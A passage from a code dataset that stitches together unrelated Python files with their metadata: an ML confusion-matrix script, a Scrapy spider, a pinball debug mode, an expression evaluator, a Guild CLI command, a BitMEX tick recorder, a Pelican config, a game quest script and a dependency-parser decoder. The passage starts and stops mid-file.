new_data_labels.insert(item,[item,class_name[int(tie_breaker_pred[0])][1],int(tie_breaker_pred[0])])\nelse:\n num_missing_labels=len(new_data)-len(new_data_labels)\n for i in range(len(new_data_labels)+num_missing_labels):\n if new_data_labels[-1][0]!=len(new_data)-1:\n new_data_labels.append([len(new_data)-1,'RETEST','N/A'])\n if new_data_labels[i][0]!=i:\n new_data_labels.insert(i,[i,'RETEST','N/A'])\n \n########### NEW DATA EVALUATOR: IF TARGETS ARE KNOWN #################\n\n# Compares new data predictions with their known targets and calculates\n# an accuracy value, a percent of required 'RETEST' points, and outputs\n# a confusion matrix\nif new_targets_num: \n ttn=0\n rrn=0\n for i in range(len(new_data_labels)):\n if new_data_labels[i][2]==new_targets_num[i]:\n ttn += 1\n elif new_data_labels[i][2]=='N/A':\n rrn += 1 \n acc_new_data = float(ttn)/(len(new_data_labels)-rrn)*100\n retest_new_data = float(rrn)/len(new_data_labels)*100\n print('Overall Accuracy of New Data: %.2f' % acc_new_data) \n print('RETEST percentage: %.2f' % retest_new_data)\n \n color1=[]\n for i in range(len(new_data)):\n if new_data_labels[i][2]=='N/A':\n color1.append([28])\n else:\n color1.append([new_data_labels[i][2]])\n color2=[]\n for i in range(numClasses):\n for j in range(numTests):\n color2.append([i])\n \n \n #fig = plt.figure()\n #ax = fig.add_subplot(111, projection='3d')\n #ax.scatter(new_data[:,0], new_data[:,2], new_data[:,4], c=color1, cmap=plt.cm.rainbow)\n #plt.title('Predicted Labels')\n #ax.set_xlabel('V1 {CuCl2} (mV)')\n #ax.set_ylabel('V2 {KF} (mV)')\n #ax.set_zlabel('V3 {ZnCl2} (mV)')\n #plt.show()\n #\n #fig = plt.figure()\n #ax = fig.add_subplot(111, projection='3d')\n #ax.scatter(new_data[:,0], new_data[:,2], new_data[:,4], c=color2, cmap=plt.cm.rainbow)\n #plt.title('True Labels')\n #ax.set_xlabel('V1 {CuCl2} (mV)')\n #ax.set_ylabel('V2 {KF} (mV)')\n #ax.set_zlabel('V3 {ZnCl2} (mV)')\n #plt.show()\n \n ###################################################\n # if you DO NOT want RETEST to appear in confusion matrix use this section\n \n ## N/A data labels will be deleted so that they do not appear in confusion matrix\n na_data_labels=[]\n for i in range(len(new_data_labels)):\n if new_data_labels[i][2]=='N/A':\n na_data_labels.append(i)\n na_data_labels = sorted(na_data_labels,reverse=True)\n for i in na_data_labels:\n del new_data_labels[i]\n \n class_name1=[]\n class_name2=[]\n for i in range(len(class_name)):\n class_name1.append(class_name[i][0])\n class_name2.append(class_name[i][1])\n \n class_name3=[]\n for i in range(len(class_name2)):\n try:\n class_name3.append(int(float(class_name2[i])))\n except ValueError:\n class_name3.append(class_name2[i])\n #\n new_data_labels_num=[x[2] for x in new_data_labels]\n #new_data_labels_num_unique=np.unique(new_data_labels_num)\n new_targets_num_unique=np.unique(new_targets_num)\n not_new_targets_num=np.delete(class_name1,new_targets_num_unique)\n for i in range(len(not_new_targets_num)):\n new_targets_num.append(not_new_targets_num[i])\n new_data_labels_num.append(numClasses+1) \n for i in na_data_labels:\n del new_targets_num[i]\n ################################################## \n # if you DO want RETEST use the below section \n \n # for i in range(len(new_data_labels)):\n # if new_data_labels[i][2]=='N/A':\n # new_data_labels[i][2]=numClasses \n # class_name.append([numClasses,'RETEST'])\n # class_name.append([numClasses+1,'NO TESTS'])\n # class_name1=[]\n # class_name2=[]\n # for i in range(len(class_name)):\n # class_name1.append(class_name[i][0])\n # class_name2.append(class_name[i][1])\n # \n # class_name3=[]\n # if multiDatafile==True:\n # for i in range(len(class_name2)):\n # if file_used=='Metals':\n # if i <= 24:\n # class_name3.append(int(float(class_name2[i])))\n # else:\n # class_name3.append(class_name2[i])\n # else:\n # class_name3.append(class_name2[i])\n # else:\n # for i in range(len(class_name1)):\n # class_name3.append(class_name1[i])\n # #\n # new_data_labels_num=[x[2] for x in new_data_labels]\n # new_data_labels_num_unique=np.unique(new_data_labels_num)\n # new_targets_num_unique=np.unique(new_targets_num)\n # not_new_targets_num=np.delete(class_name1,new_targets_num_unique)\n # for i in range(len(not_new_targets_num)):\n # new_targets_num.append(not_new_targets_num[i])\n # new_data_labels_num.append(numClasses+1) \n \n ##################################################\n #Confusion Matrix \n \n from sklearn.metrics import confusion_matrix\n import matplotlib.pyplot as plt\n conf_matrix=confusion_matrix(new_targets_num,new_data_labels_num)\n cm_norm = conf_matrix.astype('float') / conf_matrix.sum(axis=1)[:, np.newaxis]\n \n \n def plot_confusion_matrix(cm, title='Win Prediction Confusion Matrix (Accuracy = %.1f%%, Retest = %.1f%%)' % (acc_new_data,retest_new_data) , cmap=plt.cm.hot_r):\n # , Retest = %.1f%% ,retest_new_data\n plt.imshow(cm, interpolation='nearest', cmap=cmap, vmin=0, vmax=1)\n plt.title(title)\n plt.colorbar()\n tick_marks = range(len(conf_matrix))\n plt.xticks(tick_marks, [x for x in class_name3], rotation=75)\n plt.yticks(tick_marks, [x for x in class_name3])\n plt.tight_layout()\n plt.ylabel('True label')\n plt.xlabel('Predicted label')\n \n fig = plt.figure()\n fig.patch.set_facecolor('white')\n plot_confusion_matrix(cm_norm)\n plt.show() \nelse:\n print(new_data_labels)\n end = tm.time()\n elapsed_time = end-start_nd\n print(\"New Data Run Time = %0.1f seconds\" % elapsed_time)\n \n# CBC_newData()\n# CBC_newData(new_data=[[...]],new_targets_num=False)\n \nend = time.time()\nelapsed_time = end-start\nprint(\"Total Run Time = %0.1f seconds\" % elapsed_time)","sub_path":"CBC_ML_Ensemble.py","file_name":"CBC_ML_Ensemble.py","file_ext":"py","file_size_in_byte":36950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"430783951","text":"import scrapy\n\n\nclass TestSpider(scrapy.Spider):\n name = 'test'\n allowed_domains = ['192.168.100.11']\n start_urls = ['http://192.168.100.11:9999/']\n\n def parse(self, response):\n self.logger.info(response.headers.getlist(\"Set-Cookie\"))\n url = 'http://192.168.100.11:9999/login'\n yield scrapy.FormRequest(url, formdata={'username': '1', 'password': '1'},\n meta={'dont_redirect': True, 'handle_httpstatus_list': [302]},\n callback=self.afterlogin)\n self.logger.info(response.headers.getlist(\"Set-Cookie\"))\n\n def afterlogin(self, response):\n yield scrapy.Request('http://192.168.100.11:9999', callback=self.redirect)\n\n def redirect(self, response):\n title_page_links = response.css('.card-title a')\n yield from response.follow_all(title_page_links, self.parse_detail)\n\n pagination_links = response.css('.pagination a.page-link')\n yield from response.follow_all(pagination_links, self.redirect)\n\n def parse_detail(self, response):\n def extract_with_css(query):\n return response.css(query).get(default='').strip()\n\n image = '.card-img-top::attr(src)'\n title = '.card-title::text'\n stock = '.card-stock::text'\n description = '.card-text::text'\n\n return {\n 'image': extract_with_css(image),\n 'title': extract_with_css(title),\n 'stock': extract_with_css(stock),\n 'desc': extract_with_css(description),\n }\n","sub_path":"tutorial/tutorial/spiders/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"32220905","text":"################################################################################################\n## _______ _____ _______ _______\n## | | | | |_____| |\n## | |_____| | | | |_____\n##\n## _______ __ _ __ _ _____ _ _ _____ _______ _______ _____ _____ __ _\n## |_____| | \\ | | \\ | | |_____| | | |_____| | | | | | \\ |\n## | | | \\_| | \\_| __|__ | | __|__ |_____ | | | __|__ |_____| | \\_|\n##\n################################################################################################\n\n################################################################################################\n## ______ _______ ______ _ _ ______\n## | \\ |______ |_____] | | | ____\n## |_____/ |______ |_____] |_____| |_____|\n##\n## _______ _____ ______ _______\n## | | | | | | \\ |______\n## | | | |_____| |_____/ |______\n##\n################################################################################################\n\n################################################################################################\n## _____ __ _ _______ _____\n## | | \\ | |______ | |\n## __|__ | \\_| | |_____|\n##\n################################################################################################\n## This mode is an advanced mode in Total Annihilation that will handle debug display data.\n################################################################################################\n\nimport procgame.game\nfrom procgame.game import AdvancedMode\n\nimport pygame\nfrom pygame.locals import *\nfrom pygame.font import *\nfrom pygame.font import *\nfrom procgame import dmd\nfrom procgame.dmd import HDFontStyle, GroupedLayer, HDTextLayer\n\nclass DebugMode(procgame.game.AdvancedMode):\n def __init__(self, game):\n super(DebugMode, self).__init__(game=game, priority=8999, mode_type=AdvancedMode.Game)\n ## Global Variables ###########################################################################################\n self.debugDisplayEnabled = False\n self.debugDisplayLoopSeconds = 2\n self.lastSwitchHit0 = \"NONE\"\n self.lastSwitchHit1 = \"NONE\"\n self.lastSwitchHit2 = \"NONE\"\n self.lastSwitchHit3 = \"NONE\"\n self.lastSwitchHit4 = \"NONE\"\n self.lastSwitchHit5 = \"NONE\"\n\n self.infoStartHeight = 60\n self.infoIncrement = 14\n\n ## Global Switch Handler Definitions #########################################################################\n for sw in self.game.switches:\n self.add_switch_handler(name=sw.name, event_type=\"active\", delay=None, handler=self.debugSwitchHandler)\n\n ###############################################################################################\n ## Main Mode Functions\n ## Typically mode_started, mode_stopped, and update_lamps\n ###############################################################################################\n def mode_started(self):\n if self.game.user_settings['Machine (Standard)']['Debug Mode'] == 'On':\n self.enableDebugDisplay()\n else:\n pass\n\n def mode_stopped(self):\n self.disableDebugDisplay()\n\n ###############################################################################################\n ## Ballsearch Enable/Disable Functions\n ###############################################################################################\n def disableDebugDisplay(self):\n self.debugDisplayEnabled = False\n self.cancel_delayed('debugDisplayLoop')\n\n def enableDebugDisplay(self):\n self.debugDisplayEnabled = True\n self.cancel_delayed('debugDisplayLoop')\n self.delay(name='debugDisplayLoop',delay=self.debugDisplayLoopSeconds,handler=self.debugDisplayLoop)\n\n ###############################################################################################\n ## Debug Switch Handlers\n ###############################################################################################\n def debugSwitchHandler(self,sw):\n if self.debugDisplayEnabled == True:\n self.cancel_delayed('debugDisplayLoop')\n self.lastSwitchHit5 = self.lastSwitchHit4\n self.lastSwitchHit4 = self.lastSwitchHit3\n self.lastSwitchHit3 = self.lastSwitchHit2\n self.lastSwitchHit2 = self.lastSwitchHit1\n self.lastSwitchHit1 = self.lastSwitchHit0\n self.lastSwitchHit0 = str(sw.name)\n self.debugDisplayLoop()\n return procgame.game.SwitchContinue\n\n ###############################################################################################\n ## Debug Loop Functions\n ###############################################################################################\n # Ball 1 locked\n # Ball 2 Locked\n # Ball Search Status\n # Reactor Status\n # Reactor Hits vs Total Needed\n # Trough Status\n def debugDisplayLoop(self):\n self.layer = None\n\n self.debugDisplayLayer = dmd.GroupedLayer(480,270)\n self.debugBallsearchLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight, font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugBallsearchLayer.set_text(\"BALLSEARCH: \" + str(self.game.ballsearch_mode.ballsearchEnabled) + \"-\" + str(self.game.ballsearch_mode.lastBallSearchSwitch))\n self.debugLocksLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*1), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugLocksLayer.set_text(\"LOCKS: BALL1-\" + str(self.game.MultiballController_mode.ball1Locked()) + \" BALL2-\" + str(self.game.MultiballController_mode.ball2Locked()) + \"TOTAL-\" + str(self.game.trough.num_balls_locked))\n self.debugReactorLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*2), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugReactorLayer.set_text(\"REACTOR HITS: \" + str(self.game.coreControl_mode.currentReactorShotsMade) + \"/\" + str(self.game.coreControl_mode.currentReactorShotsNeeded))\n self.debugTroughLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*3), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugTroughLayer.set_text(\"TROUGH: \" + str(self.game.trough.num_balls()))\n self.debugTheatricsLayer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*4), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugTheatricsLayer.set_text(\"THEATRICS RUNNING: \" + str(self.game.theatricsRunning))\n self.debugSwitch1Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*5), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch1Layer.set_text(\"Last Switch 1: \" + self.lastSwitchHit0)\n self.debugSwitch2Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*6), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch2Layer.set_text(\"Last Switch 2: \" + self.lastSwitchHit1)\n self.debugSwitch3Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*7), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch3Layer.set_text(\"Last Switch 3: \" + self.lastSwitchHit2)\n self.debugSwitch4Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*8), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch4Layer.set_text(\"Last Switch 4: \" + self.lastSwitchHit3)\n self.debugSwitch5Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*9), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch5Layer.set_text(\"Last Switch 5: \" + self.lastSwitchHit4)\n self.debugSwitch6Layer = dmd.HDTextLayer(x=10, y=self.infoStartHeight+(self.infoIncrement*10), font=self.game.fonts['debugInfo'], justify=\"left\", fontstyle=self.game.fontstyles['taGreen'])\n self.debugSwitch6Layer.set_text(\"Last Switch 6: \" + self.lastSwitchHit5)\n\n self.debugDisplayLayer.layers.append(self.debugLocksLayer)\n self.debugDisplayLayer.layers.append(self.debugBallsearchLayer)\n self.debugDisplayLayer.layers.append(self.debugReactorLayer)\n self.debugDisplayLayer.layers.append(self.debugTroughLayer)\n self.debugDisplayLayer.layers.append(self.debugTheatricsLayer)\n self.debugDisplayLayer.layers.append(self.debugSwitch1Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch2Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch3Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch4Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch5Layer)\n self.debugDisplayLayer.layers.append(self.debugSwitch6Layer)\n\n self.debugDisplayLayer.opaque=False\n\n self.layer = self.debugDisplayLayer\n\n if self.debugDisplayEnabled == True:\n self.delay(name='debugDisplayLoop',delay=self.debugDisplayLoopSeconds,handler=self.debugDisplayLoop)\n","sub_path":"TotalAnnihilation/my_modes/Debug.py","file_name":"Debug.py","file_ext":"py","file_size_in_byte":9468,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"553665587","text":"from copy import copy, deepcopy\nfrom collections import defaultdict, deque, Counter\nfrom blist import *\nfrom parse import compile\nimport sys\n# sys.setrecursionlimit(10000)\n\n# regx = compile(\"x={}, y={}..{}\")\n# regy = compile(\"y={}, x={}..{}\")\n\ns = input()\nlines = []\nwhile s != 'done':\n lines.append(s.replace(' ', ''))\n s = input()\n \ndef eval(expr):\n if len(expr) == 1:\n tot = expr[0]\n # print('evaluating {} = {}'.format(expr, tot))\n return tot\n \n tot = None\n for i, c in enumerate(expr):\n if c == '*':\n tot = eval(expr[0:i]) * eval(expr[i+1:])\n \n if tot is None:\n for i, c in enumerate(expr):\n if c == '+':\n tot = eval(expr[0:i]) + eval(expr[i+1:])\n \n print('evaluating {} = {}'.format(expr, tot))\n return tot\n \ndef resolve(line):\n expr = []\n curr = ''\n in_paren = 0\n for c in line:\n if c == '(':\n if in_paren >= 1:\n curr += c\n in_paren += 1\n \n # do stuff\n elif c == ')':\n in_paren -= 1\n if in_paren >= 1:\n curr += c\n if in_paren == 0:\n expr.append(resolve(curr))\n curr = ''\n else:\n if in_paren > 0:\n curr += c\n else:\n if c == '*' or c == '+':\n expr.append(c)\n else:\n expr.append(int(c))\n return eval(expr)\n\ntot = 0\nfor l in lines:\n tot += resolve(l)\nprint(tot)\n \n \n# 10 participants, kev 1 on 10 days, ryd 2 on 10 days\n# kev = 10*2*10 = 200\n# ryd = 9*2*10 = 180\n# reduce to 2 participants\n# kev = 2*2*10 = 40\n# ryd = 1*2*10 = 20\n \n \n \n \n \n \n \n \n \n \n \n # hello","sub_path":"2020/day18/solve.py","file_name":"solve.py","file_ext":"py","file_size_in_byte":1806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"79269602","text":"# Copyright 2017-2019 TensorHub, Inc.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nimport click\n\nfrom guild import click_util\n\nfrom . import remote_support\nfrom . import runs_support\n\ndef label_params(fn):\n click_util.append_params(fn, [\n runs_support.runs_arg,\n click.Argument((\"label\",), required=False),\n runs_support.op_and_label_filters,\n runs_support.status_filters,\n click.Option(\n (\"-c\", \"--clear\"),\n help=\"Clear the run's label.\",\n is_flag=True),\n remote_support.remote_option(\"Label remote runs.\"),\n click.Option(\n (\"-y\", \"--yes\"),\n help=\"Do not prompt before modifying labels.\",\n is_flag=True),\n ])\n return fn\n\n@click.command(\"label\")\n@label_params\n\n@click.pass_context\n@click_util.use_args\n@click_util.render_doc\n\ndef label_runs(ctx, args):\n \"\"\"Set run labels.\n\n If `LABEL` is provided, the command will label the selected\n runs. To clear a run label, use the ``--clear`` option.\n\n Specify runs to modify using one or more `RUN` arguments. See\n SPECIFYING RUNS for more information.\n\n If `RUN` isn't specified, the most recent run is selected.\n\n By default Guild will prompt you before making any changes. If you\n want to apply the changes without being prompted, use the\n ``--yes`` option.\n\n {{ runs_support.runs_arg }}\n\n If a `RUN` argument is not specified, ``0`` is assumed (the most\n recent run).\n\n {{ runs_support.op_and_label_filters }}\n\n {{ runs_support.status_filters }}\n\n ### Labeling remote runs\n\n To label remote runs, use `--remote`.\n\n {{ remote_support.remote_option }}\n\n \"\"\"\n from . import runs_impl\n runs_impl.label(args, ctx)\n","sub_path":"guild/commands/runs_label.py","file_name":"runs_label.py","file_ext":"py","file_size_in_byte":2309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"20163229","text":"import configparser\nimport datetime\nimport time\n\nfrom bitmex_websocket import BitMEXWebsocket\nfrom pymongo import MongoClient\n\nclass tickWriter:\n ws = BitMEXWebsocket(endpoint=\"wss://www.bitmex.com/realtime\", symbol=\"XBTUSD\",\n api_key=None, api_secret=None)\n ws.get_instrument()\n\n def __init__(self):\n config = configparser.ConfigParser()\n config.read('config.ini')\n address = config['MONGODB']['LocalAddress']\n portString = config['MONGODB']['LocalPort']\n port = int(portString)\n dbName = config['MONGODB']['DB']\n collName = config['MONGODB']['Collection']\n self.client = MongoClient(address, port)\n self.db = self.client[dbName]\n self.collection = self.db[collName]\n\n def postProcess(self):\n tickDict = self.ws.recent_trades()\n now = datetime.datetime.now()\n print(now.strftime('%Y-%m%d %H:%M:%S'), \"Connection Error Occured\")\n self.ws.get_instrument()\n time.sleep(0.1)\n editedDict = []\n for tickList in tickDict:\n tempList = tickList\n if (len(list(tempList.keys())) > 5):\n del tempList['symbol']\n del tempList['tickDirection']\n del tempList['trdMatchID']\n del tempList['grossValue']\n del tempList['homeNotional']\n del tempList['foreignNotional']\n tempList['timestamp'] = tempList['timestamp'].replace(\"T\", \" \").replace(\"Z\", \"\")\n editedDict.append(tempList)\n\n return editedDict\n\n\n def tickWriter(self):\n tempList = self.postProcess()\n if(tempList.__len__() > 0):\n\n post_id = self.collection.insert_many(tempList).inserted_ids\n post_id\n\n for temp in tempList:\n print(temp)\n\n\n\n","sub_path":"tickWriter.py","file_name":"tickWriter.py","file_ext":"py","file_size_in_byte":1838,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"51250139","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*- #\n\nAUTHOR = 'Alexandre Vicenzi'\nSITEURL = 'http://localhost:8000'\nSITENAME = \"Alexandre Vicenzi's Blog\"\nSITETITLE = AUTHOR\nSITESUBTITLE = 'Sotfware Engineer - Maker'\nSITEDESCRIPTION = '%s\\'s Thoughts and Writings' % AUTHOR\nSITELOGO = '//s.gravatar.com/avatar/5dc5ba59a94eeab2106ad9d397361b2c?s=120'\nFAVICON = '/images/favicon.ico'\nBROWSER_COLOR = '#333333'\nPYGMENTS_STYLE = 'monokai'\n\nROBOTS = 'index, follow'\n\nTHEME = '../flex'\nPATH = 'content'\nTIMEZONE = 'America/New_York'\nDEFAULT_LANG = 'en'\nOG_LOCALE = 'en_US'\nLOCALE = 'en_US'\n\nDATE_FORMATS = {\n 'en': '%B %d, %Y',\n}\n\nFEED_ALL_ATOM = 'feeds/all.atom.xml'\nCATEGORY_FEED_ATOM = 'feeds/%s.atom.xml'\nTRANSLATION_FEED_ATOM = None\nAUTHOR_FEED_ATOM = None\nAUTHOR_FEED_RSS = None\n\nUSE_FOLDER_AS_CATEGORY = False\nMAIN_MENU = True\n\nLINKS = (('Portfolio', 'http://alexandrevicenzi.com'),)\n\nSOCIAL = (('linkedin', 'https://br.linkedin.com/in/alexandrevicenzi/en'),\n ('github', 'https://github.com/alexandrevicenzi'),\n ('google', 'https://google.com/+AlexandreVicenzi'),\n ('twitter', 'https://twitter.com/alxvicenzi'),\n ('rss', '//blog.alexandrevicenzi.com/feeds/all.atom.xml'))\n\nMENUITEMS = (('Archives', '/archives.html'),\n ('Categories', '/categories.html'),\n ('Tags', '/tags.html'),)\n\nCC_LICENSE = {\n 'name': 'Creative Commons Attribution-ShareAlike',\n 'version': '4.0',\n 'slug': 'by-sa'\n}\n\nCOPYRIGHT_YEAR = 2016\n\nDEFAULT_PAGINATION = 10\n\nPLUGIN_PATHS = ['./pelican-plugins']\nPLUGINS = ['sitemap', 'post_stats']\n\nSITEMAP = {\n 'format': 'xml',\n 'priorities': {\n 'articles': 0.6,\n 'indexes': 0.6,\n 'pages': 0.5,\n },\n 'changefreqs': {\n 'articles': 'monthly',\n 'indexes': 'daily',\n 'pages': 'monthly',\n }\n}\n\nDISQUS_SITENAME = \"alexandrevicenziblog\"\nADD_THIS_ID = 'ra-55adbb025d4f7e55'\n\nSTATUSCAKE = {\n 'trackid': 'SL0UAgrsYP',\n 'days': 7,\n 'rumid': 6852,\n 'design': 6,\n}\n\nSTATIC_PATHS = ['images', 'extra']\n\nEXTRA_PATH_METADATA = {\n 'extra/custom.css': {'path': 'static/custom.css'},\n}\n\nCUSTOM_CSS = 'static/custom.css'\n\nUSE_LESS = True\n","sub_path":"pelicanconf.py","file_name":"pelicanconf.py","file_ext":"py","file_size_in_byte":2170,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"237602750","text":"# Made by disKret\nimport sys\nfrom net.sf.l2j.gameserver.model.quest import State\nfrom net.sf.l2j.gameserver.model.quest import QuestState\nfrom net.sf.l2j.gameserver.model.quest.jython import QuestJython as JQuest\n\n#NPC\nLARA = 7063\nBRIGHT = 7466\nEMILY = 7620\n\n#MOBS\nWASP_WORKER = 934\nWASP_LEADER = 935\n\n#ITEMS\nFRUIT_BASKET = 7136\nAVELLAN_SPICE = 7137\nHONEY_POUCH = 7138\n\n#REWARDS\nADENA = 57\nVARNISH = 1865\n\nclass Quest (JQuest) :\n\n def __init__(self,id,name,descr):\n JQuest.__init__(self,id,name,descr)\n self.questItemIds = [HONEY_POUCH, AVELLAN_SPICE, FRUIT_BASKET]\n\n def onEvent (self,event,st) :\n htmltext = event\n cond = st.getInt(\"cond\")\n if event == \"7620-1.htm\" :\n st.set(\"cond\",\"1\")\n st.setState(STARTED)\n st.playSound(\"ItemSound.quest_accept\")\n elif event == \"7620-3.htm\" and st.getQuestItemsCount(HONEY_POUCH)==100:\n st.takeItems(HONEY_POUCH,100)\n st.set(\"cond\",\"3\")\n elif event == \"7063-1.htm\" and cond == 3:\n st.giveItems(AVELLAN_SPICE,1)\n st.set(\"cond\",\"4\")\n elif event == \"7620-5.htm\" and st.getQuestItemsCount(AVELLAN_SPICE):\n st.takeItems(AVELLAN_SPICE,1)\n st.set(\"cond\",\"5\")\n elif event == \"7466-1.htm\" and cond == 5:\n st.giveItems(FRUIT_BASKET,1)\n st.set(\"cond\",\"6\")\n elif event == \"7620-7.htm\" and st.getQuestItemsCount(FRUIT_BASKET):\n st.takeItems(FRUIT_BASKET,1)\n st.giveItems(ADENA,25000)\n st.giveItems(VARNISH,50)\n st.unset(\"cond\")\n st.playSound(\"ItemSound.quest_finish\")\n st.exitQuest(1)\n return htmltext\n\n def onTalk (Self,npc,st):\n htmltext = \"I have nothing to say to you.\"\n npcId = npc.getNpcId()\n id = st.getState()\n cond = st.getInt(\"cond\")\n if npcId == EMILY and cond == 0 :\n if st.getPlayer().getLevel() >= 34 and st.getPlayer().getLevel() <= 40 :\n htmltext = \"7620-0.htm\"\n else:\n htmltext = \"7620-0a.htm\"\n st.exitQuest(1)\n elif npcId == EMILY and st.getQuestItemsCount(HONEY_POUCH) == 100 :\n htmltext = \"7620-2.htm\"\n elif npcId == LARA and cond == 3 :\n htmltext = \"7063-0.htm\"\n elif npcId == EMILY and st.getQuestItemsCount(AVELLAN_SPICE) == 1 :\n htmltext = \"7620-4.htm\"\n elif npcId == BRIGHT and cond == 5 :\n htmltext = \"7466-0.htm\"\n elif npcId == EMILY and st.getQuestItemsCount(FRUIT_BASKET) == 1 :\n htmltext = \"7620-6.htm\"\n return htmltext\n\n def onKill (self,npc,player,isPet):\n st = player.getQuestState(\"299_GatherIngredientsForPie\")\n if st :\n if st.getState() != STARTED : return\n npcId = npc.getNpcId()\n count = st.getQuestItemsCount(HONEY_POUCH)\n if st.getInt(\"cond\") == 1 and count < 100 :\n st.giveItems(HONEY_POUCH,1)\n if count == 99 :\n st.playSound(\"ItemSound.quest_middle\")\n st.set(\"cond\",\"2\")\n else :\n st.playSound(\"ItemSound.quest_itemget\")\t\n return\n\nQUEST = Quest(299,\"299_GatherIngredientsForPie\",\"Gather Ingredients For A Pie\")\nCREATED = State('Start', QUEST)\nSTARTED = State('Started', QUEST)\n\nQUEST.setInitialState(CREATED)\nQUEST.addStartNpc(7620)\nQUEST.addTalkId(7620)\nQUEST.addTalkId(7063)\nQUEST.addTalkId(7466)\nQUEST.addKillId(WASP_LEADER)\nQUEST.addKillId(WASP_WORKER)","sub_path":"DataPack/data/scripts/quests/299_GatherIngredientsForPie/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3189,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"409011869","text":"from prepare_feature import Feature\nimport model\nimport numpy as np\nimport torch\nfrom const import Config\n\nconfig=Config()\nfeature=Feature(config)\n\n\nclass Parser(object):\n def __init__(self,sentence):\n self.sentence=sentence # [1, 2, 3, 4, 5, 6, 7]\n self.stack=[\"\"]\n self.buffer=list(sentence)\n self.dep=[]\n\n def parse_step(self,transition):\n if transition==\"S\" and len(self.buffer)>0:\n word=self.buffer.pop(0)\n self.stack.append(word)\n if transition==\"L\":\n head=self.stack[-1]\n dependent=self.stack.pop(-2)\n self.dep.append((head,dependent))\n if transition=='R':\n head=self.stack[-2]\n dependent=self.stack.pop()\n self.dep.append((head,dependent))\n\n def parse(self,transitions):\n for transition in transitions:\n self.parse_step(transition)\n return self.dep\n\n\nclass Decoding(object):\n def __init__(self,dataset,sentence2id,model,device): # 保存全部dev集/test集的数据\n self.dataset=dataset # dataset: [{\"word\":[], \"pos\":[], \"head\":[], \"label\":[]}, {}, ...]\n self.sentence2id=sentence2id # {\"2356764564\":0, \"2348654355\":1 , ...}\n self.model=model\n self.device=device\n\n def predict(self,parsers):\n '''\n w_input=[]\n p_input=[]\n l_input=[]\n for p in parsers:\n word_features, pos_features, label_features=feature.create_features(p.stack, p.buffer, p.dep, self.dataset[self.sentence2id[id(p.sentence)]])\n w_input.append(word_features)\n p_input.append(pos_features)\n l_input.append(label_features)\n '''\n\n\n x=[feature.create_features(p.stack,p.buffer,p.dep,self.dataset[self.sentence2id[id(p.sentence)]]) for p in parsers]\n x=np.array(x).astype('int32') # 二维int32数组,大小为:数据量(最大是batch_size)*48\n x=torch.from_numpy(x).long().to(self.device)\n\n '''\n w_input=np.array(w_input).astype('int32')\n p_input = np.array(p_input).astype('int32')\n l_input = np.array(l_input).astype('int32')\n w_input=torch.from_numpy(w_input).long().to(self.device)\n p_input=torch.from_numpy(p_input).long().to(self.device)\n l_input = torch.from_numpy(l_input).long().to(self.device)\n '''\n\n l=[feature.legal_labels(p.stack, p.buffer) for p in parsers]\n predict_logits=self.model(x)\n predict_logits=predict_logits.detach().numpy()\n #predict=np.argmax(predict_logits,1)\n predict = np.argmax(predict_logits+ 10000 * np.array(l).astype('float32'), 1)\n predict=[\"S\" if p==2 else (\"L\" if p==0 else \"R\") for p in predict]\n return predict\n\n def 